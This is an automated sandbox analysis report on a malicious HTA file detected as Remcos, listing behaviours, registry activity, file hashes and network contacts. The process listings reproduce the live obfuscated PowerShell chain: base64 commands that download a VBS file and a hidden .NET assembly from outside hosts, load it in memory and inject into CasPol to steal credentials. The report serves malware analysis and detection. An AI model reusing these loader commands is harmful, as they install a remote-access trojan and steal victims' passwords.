Analysis Overview
SHA256
712a8d8a82351dc2d2173b6d66245b1e2ee34db4045fa27b3e76dc462f8a5811
Threat Level: Known bad
The file seethebstpricewithbestthinghappingwithgoodnews.hta was found to be: Known bad.
Malicious Activity Summary
Remcos family
Remcos
NirSoft WebBrowserPassView
Detected Nirsoft tools
NirSoft MailPassView
Command and Scripting Interpreter: PowerShell
Evasion via Device Credential Deployment
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-11 09:37
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-11 09:37
Reported
2024-11-11 09:39
Platform
win7-20241023-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebstpricewithbestthinghappingwithgoodnews.hta"
C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE
"C:\Windows\sYSTem32\WinDOwspowERSheLl\V1.0\POWErshell.ExE" "PoWersHELL.Exe -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt ; IeX($(iEx('[SySTEM.tExT.EncODIng]'+[cHaR]0X3a+[CHAR]58+'uTF8.geTSTrING([sySTEm.coNVert]'+[chAR]58+[cHAr]0x3A+'frOmBASE64sTRInG('+[CHaR]0x22+'JEpvUDRoOEg5UzAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyZEVGSU5pdElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG1aLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFKTVpMV3BILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBvbkxZd1RQb3EsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5BV0d2c0xFTVl1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRDcFN3WU5HV2h0KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQ1hqSXVNbXlqTHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEpvUDRoOEg5UzA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NC4xNzEuMTM4LzM1MC9zZWV0aGViZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc3dpdGhvdXRoYW5kbGV0aGV0aGluZ3MudElGIiwiJGVOdjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzd2l0aG91dGhhbmRsZXRoZXRoLnZicyIsMCwwKTtTVGFyVC1TTEVFcCgzKTtzVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3N3aXRob3V0aGFuZGxldGhldGgudmJzIg=='+[cHar]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s-myyfcs.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC91A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC919.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxsaURbMV0rJFNIZWxsaWRbMTNdKydYJykgKCgoJ3VTemltYWdlVXJsID0nKycgJysnNkZVaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/JysnZicrJ2lsZWtleT0yQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjEnKyc0YmIyMDljNjJjMScrJzczMDknKyc0NTE3NmEwOTA0ZiA2RlU7dVN6d2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZScrJ20uTmV0LldlYkNsaWVudCcrJzt1U3ppbWFnZUJ5JysndGVzID0gdVN6d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh1U3ppbWFnZVVybCk7dVN6aW1hZ2VUZXh0ID0gW1N5Jysnc3RlbScrJy5UZXh0LicrJ0VuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodVN6aW1hJysnZ2VCeXRlcyk7dVN6c3RhcnRGbGFnID0gNkZVPDxCQVNFNjRfU1RBUlQ+PjZGVTt1U3plJysnbmQnKydGbCcrJ2FnID0gNkZVPDxCQVNFNjRfRU5EPj42RlU7dVN6c3RhcnRJbmRleCA9IHVTemltYWdlVGV4dC5JbmRleE9mKHVTenN0YXJ0RmxhZyk7dVN6ZW5kSW5kZXggPSB1U3ppbWFnZVRleHQuSW5kZXhPZih1U3plbmRGbGFnKTt1U3onKydzdGFydEluZGV4IC1nZSAwIC1hbmQgdVN6JysnZW5kSW5kZXggLWd0IHVTenN0YXJ0JysnSW4nKydkZXg7dVN6c3RhcnRJbmRleCArPSB1U3pzdGFydEZsYWcuTGVuZ3RoO3VTemJhc2U2NExlbmd0aCA9IHVTeicrJ2VuZEluZGV4IC0gdVN6c3RhcnRJbmRleDt1U3piYXNlNjRDb21tYW5kID0gdVN6aW1hJysnZ2VUZXh0LlN1YnN0cmluZyh1U3pzdGFydEluZGV4LCB1U3piYXNlNjRMZW5ndGgpO3VTemJhc2U2NFJldmVyJysnc2VkID0gLWpvaW4gKHVTemJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBhUXAgRm9yRWFjaC1PYmplY3QgeyB1U3pfIH0nKycpWy0xLi4tKHVTemJhc2U2NENvbW1hbicrJ2QuTGVuZ3RoKV07dVN6Y29tbWFuZEJ5dGUnKydzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh1U3piYXNlNjRSZXZlcnNlZCk7JysndVN6bG9hZGVkJysnQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHVTemMnKydvbW1hbmRCeXRlcyk7dVN6dmFpTWV0JysnaG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGhvZCg2JysnRlVWQUk2RlUpO3VTenZhaU1ldGhvZC5JbnZva2UodVN6bnVsbCwgQCg2JysnRlV0eHQuU0RPR1RIVy8wNTMvODMxLjE3MS40OS4zMi8vOnB0dGg2RicrJ1UsIDZGVScrJ2Rlc2F0aXZhZG82RlUsIDZGVWRlc2F0aXZhZG82RlUsIDZGVWQnKydlc2F0aXZhZG82RlUsIDZGVUNhc1BvbDZGVSwgNkYnKydVZGVzYXRpdmFkbzZGVSwgNkZVJysnZGVzYXRpdmFkbzZGVSw2RlVkZXNhdGl2YWRvNkZVLDZGVWRlc2F0aXZhZG82RlUsNkZVZGVzYXRpdmFkbzZGVSw2RlVkZXNhdGl2YWRvNkZVLDZGVWRlc2F0aXZhZG82RlUsNkZVMTZGVSw2RlVkZXNhdGl2YWRvNkZVKSk7JykgIC1yZXBsYWNlIChbY0hhcl01NCtbY0hhcl03MCtbY0hhcl04NSksW2NIYXJdMzktcmVwbGFjZSAgKFtjSGFyXTExNytbY0hhcl04MytbY0hhcl0xMjIpLFtjSGFyXTM2IC1DUkVwTEFjZSAgJ2FRcCcsW2NIYXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElliD[1]+$SHellid[13]+'X') ((('uSzimageUrl ='+' '+'6FUhttps://1017.filemail.com/api/file/get?'+'f'+'ilekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f61'+'4bb209c62c1'+'7309'+'45176a0904f 6FU;uSzwe'+'bClient = New-Object Syste'+'m.Net.WebClient'+';uSzimageBy'+'tes = uSzwebClient.DownloadData(uSzimageUrl);uSzimageText = [Sy'+'stem'+'.Text.'+'Encoding]::UTF8.GetString(uSzima'+'geBytes);uSzstartFlag = 6FU<<BASE64_START>>6FU;uSze'+'nd'+'Fl'+'ag = 6FU<<BASE64_END>>6FU;uSzstartIndex = uSzimageText.IndexOf(uSzstartFlag);uSzendIndex = uSzimageText.IndexOf(uSzendFlag);uSz'+'startIndex -ge 0 -and uSz'+'endIndex -gt uSzstart'+'In'+'dex;uSzstartIndex += uSzstartFlag.Length;uSzbase64Length = uSz'+'endIndex - uSzstartIndex;uSzbase64Command = uSzima'+'geText.Substring(uSzstartIndex, uSzbase64Length);uSzbase64Rever'+'sed = -join (uSzbase64Command.ToCharArray() aQp ForEach-Object { uSz_ }'+')[-1..-(uSzbase64Comman'+'d.Length)];uSzcommandByte'+'s = [System.Convert]::FromBase64String(uSzbase64Reversed);'+'uSzloaded'+'Assembly = [System.Reflection.Assembly]::Load(uSzc'+'ommandBytes);uSzvaiMet'+'hod = [d'+'nlib.IO.Home].GetMethod(6'+'FUVAI6FU);uSzvaiMethod.Invoke(uSznull, @(6'+'FUtxt.SDOGTHW/053/831.171.49.32//:ptth6F'+'U, 6FU'+'desativado6FU, 6FUdesativado6FU, 6FUd'+'esativado6FU, 6FUCasPol6FU, 6F'+'Udesativado6FU, 6FU'+'desativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FU16FU,6FUdesativado6FU));') -replace ([cHar]54+[cHar]70+[cHar]85),[cHar]39-replace ([cHar]117+[cHar]83+[cHar]122),[cHar]36 -CREpLAce 'aQp',[cHar]124) )"
Network
| Country | Destination | Domain | Proto |
| US | 23.94.171.138:80 | 23.94.171.138 | tcp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 877b8b09f9aa4dfaed53349f7f3ab189 |
| SHA1 | c1f52b500201a18c8e01c717c91a5f453bc0c221 |
| SHA256 | c454d2d4834346dda2a9c446d0ea1d7119214af85259f2f2faea7b09181137cc |
| SHA512 | 41bc366ba39e7d348a6752de69feb89c0ff7400304c382cd6a8053791493fe4d04d96c4353e560d2143075d16f38f0492d1125edd250b0af986620bbd1c9a7b6 |
\??\c:\Users\Admin\AppData\Local\Temp\s-myyfcs.cmdline
| MD5 | 731d1450c89b97e35b0b5867de3c69da |
| SHA1 | 5d663061e5a15b56c610c9d33d163197a955a86a |
| SHA256 | 5d31d820f31f921a1270812529b4bda56a5edf3e027e0e4aa6587f0ebbe93b33 |
| SHA512 | dca76a6f6fcf4b24cd900ab4da564dc5b168bfcbe5f1a04169b6522303b3dd15b106b4d4221032be7c65d993bcb813702ee77bbd6ce558710630b2ecfddb0c0e |
\??\c:\Users\Admin\AppData\Local\Temp\s-myyfcs.0.cs
| MD5 | 3acd336f0bedb873ee783ee181c191ff |
| SHA1 | ef57a3ee45eba0918f34b5eb8640cad14c65ca9e |
| SHA256 | ed4508bd17e5ecb9f847135624310d5a51c108bbb2ae43bf65f7678b561e71fa |
| SHA512 | 51e10cf11020d2a298a2f05ac59d5b41877d2b096adef0b1aa29e57cecc1dde7f9276e1ff3b6916ee23701495fc983cd54f24b5c9ece1e43e46daa31eb906117 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCC919.tmp
| MD5 | 2b68737b5d5d1eca337012f7784c5b4d |
| SHA1 | dfaf7cc57f6636ca8e5e8c79b7b3d7d6aaa24507 |
| SHA256 | ad4d5aedfb689dcb86c93dcb53b1f77cff18105308c061d06870497df94eb111 |
| SHA512 | c6ca07b6fb913c375eae741ca66498ac3ad015340504ca06cd4bbed672f29f513fcaef6ff84c4e055c3417c2f847c1d3ffe70c881667c4f042d82fb043492c87 |
C:\Users\Admin\AppData\Local\Temp\RESC91A.tmp
| MD5 | 489ea33c4e10141c636368afc13ce1a9 |
| SHA1 | a90780f7fb48903fa2657c90cbe0df3772eb35f9 |
| SHA256 | bcd1fc83dc0e2d152f189988d82637d01533465ff9c574ac7c5e0063ba764efe |
| SHA512 | 9be7322d145d965ba64e24647eea0c21c297f46de12635a894785e822aa9438f350c2014980cf6b6caf92ac1acbf95c5965b55ff41e428821c933447df582357 |
C:\Users\Admin\AppData\Local\Temp\s-myyfcs.dll
| MD5 | b6e6236a88a643b3bb666f9facb0a568 |
| SHA1 | 311f9c0d187a98fe090f3c634cf96a326db33f00 |
| SHA256 | 749279688acf603bbab895b66c9026b32ca866a9d18c990ac73fc8a10f521798 |
| SHA512 | f4f758a5063d76f62c4a5e0b749693f1afde519b103406330f878617a030cc30473bb82b0ed5218f928144672eb5b69184e1d1f4c4f768ec97510e0ca6311e51 |
C:\Users\Admin\AppData\Local\Temp\s-myyfcs.pdb
| MD5 | a45e7c021aa8706d0202a0c719f6dee6 |
| SHA1 | 5937f564544dc2e378bfb79722c893ebf09a9ec8 |
| SHA256 | 989ac574be72576f82a1845020be158d75b3668a163987f528b004d7431037cb |
| SHA512 | d424edad2599b9d6d5e86718f708cea9a59a42be097dde21a4dad993cb581f10e852ea88aa1dc1aab178aba67d073f4e386ac099ffe25ae4d45a925219e09151 |
C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs
| MD5 | 6234bbb162edd9092f298bc3fc3580f9 |
| SHA1 | ce76d6cde8d930269e7c91be5d96f8202b0a45d5 |
| SHA256 | efae71d7eb1ab6860ab593ed670d8274fca4f3aac8473fe1cb39c18d0edd2ec2 |
| SHA512 | f16c5f4d0f2a09cf8d62a5756cbf16faccfa690ba86442962982941b925e5deb572505e9ff0ad5aa5ea48babe05ea6a64f769f27582edc29613a6958b20cf83f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-11 09:37
Reported
2024-11-11 09:39
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Remcos
Remcos family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2540 set thread context of 1220 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 1220 set thread context of 2356 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 1220 set thread context of 2988 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 1220 set thread context of 3128 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebstpricewithbestthinghappingwithgoodnews.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE
"C:\Windows\sYSTem32\WinDOwspowERSheLl\V1.0\POWErshell.ExE" "PoWersHELL.Exe -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt ; IeX($(iEx('[SySTEM.tExT.EncODIng]'+[cHaR]0X3a+[CHAR]58+'uTF8.geTSTrING([sySTEm.coNVert]'+[chAR]58+[cHAr]0x3A+'frOmBASE64sTRInG('+[CHaR]0x22+'JEpvUDRoOEg5UzAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyZEVGSU5pdElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG1aLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFKTVpMV3BILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBvbkxZd1RQb3EsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5BV0d2c0xFTVl1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRDcFN3WU5HV2h0KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQ1hqSXVNbXlqTHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEpvUDRoOEg5UzA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NC4xNzEuMTM4LzM1MC9zZWV0aGViZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc3dpdGhvdXRoYW5kbGV0aGV0aGluZ3MudElGIiwiJGVOdjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzd2l0aG91dGhhbmRsZXRoZXRoLnZicyIsMCwwKTtTVGFyVC1TTEVFcCgzKTtzVGFSdCAgICAgICAgICAg